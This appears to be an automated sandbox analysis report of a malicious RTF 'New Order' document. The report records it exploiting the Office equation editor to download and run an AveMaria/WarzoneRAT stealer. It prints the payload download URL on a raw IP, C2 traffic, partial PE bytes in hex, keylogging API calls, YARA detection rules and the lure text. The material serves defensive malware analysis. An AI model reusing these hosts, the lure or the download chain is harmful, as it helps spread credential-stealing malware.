            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Aug 2022 06:57:45 GMTServer: ApacheLast-Modified: Thu, 04 Aug 2022 23:59:00 GMTETag: "23fe00-5e573221f770a"Accept-Ranges: bytesContent-Length: 2358784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 0f 5b 56 f3 6e 35 05 f3 6e 35 05 f3 6e 35 05 5e 30 34 04 f1 6e 35 05 5e 30 36 04 f7 6e 35 05 5e 30 31 04 fe 6e 35 05 5e 30 30 04 d5 6e 35 05 fa 16 b6 05 f0 6e 35 05 fa 16 a6 05 e8 6e 35 05 f3 6e 34 05 7d 6e 35 05 46 30 30 04 f0 6e 35 05 46 30 35 04 f2 6e 35 05 46 30 ca 05 f2 6e 35 05 f3 6e a2 05 f2 6e 35 05 46 30 37 04 f2 6e 35 05 52 69 63 68 f3 6e 35 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a 18 ec 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 8c 00 00 00 6e 23 00 00 00 00 00 3a 8d 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 c6 00 00 a8 00 00 00 88 c7 00 00 2c 01 00 00 00 b0 21 00 d0 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 24 00 00 0d 00 00 20 ad 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ad 00 00 18 00 00 00 40 ad 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 8a 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 34 00 00 00 a0 00 00 00 36 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a0 20 00 00 e0 00 00 00 9c 20 00 00 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 60 00 00 00 00 90 21 00 00 02 00 00 00 62 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 a0 21 00 00 02 00 00 00 64 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 88 02 00 00 b0 21 00 00 8a 02 00 00 66 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 0d 00 00 00 40 24 00 00 0e 00 00 00 f0 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /fifthikmerozx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A27D3 URLDownloadToFileW,ShellExecuteW,
            Source: Joe Sandbox ViewASN Name: QUONIXNETUS QUONIXNETUS
            Source: Joe Sandbox ViewASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
            Source: Joe Sandbox ViewIP Address: 76.8.53.133 76.8.53.133
            Source: Joe Sandbox ViewIP Address: 208.67.105.179 208.67.105.179
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 76.8.53.133:1198
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exe
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exe.
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exej
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exelateC:
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exerrC:
            Source: powershell.exe, 00000006.00000002.988213966.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.co
            Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: fiftikmernk852317.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B64019E-B848-4D54-A6DE-401B40718F4D}.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AD0A3 recv,
            Source: global trafficHTTP traffic detected: GET /fifthikmerozx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com9 equals www.linkedin.com (Linkedin)
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A89D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

            E-Banking Fraud

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Initial sample is an obfuscated RTF file
            Source: initial sampleStatic file information: Filename: New Order ( MY 01-22-DTHI .doc
            Malicious sample detected (through community Yara rule)
            Source: New Order ( MY 01-22-DTHI .doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: enable editing to open in readable fomat??7!?:|"$]?79#3~[|n,"3++:&'^?9?1?,0* !^+[72"!(98,?1'47;
            Source: Screenshot number: 8Screenshot OCR: enable editing to operi inmddbl' i / 1/ [ fcKulat??7r'1$]??t9#3~[|j?>"3++:&"?9?l?,0'k"+[72"!(98 ?
            Source: Screenshot number: 12Screenshot OCR: enable editing to open in readable fomat'??7!?:|"$]?T.%3~[|-|'?-,"3H:&'^?12,0*!^+[72"!(98,?1'47;:
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD6C40
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B1BF8
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02431537
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01FC1F22
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: fifthikmerozx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: fiftikmernk852317.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77620000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77740000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77620000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77740000 page execute and read and write
            Source: New Order ( MY 01-22-DTHI .doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
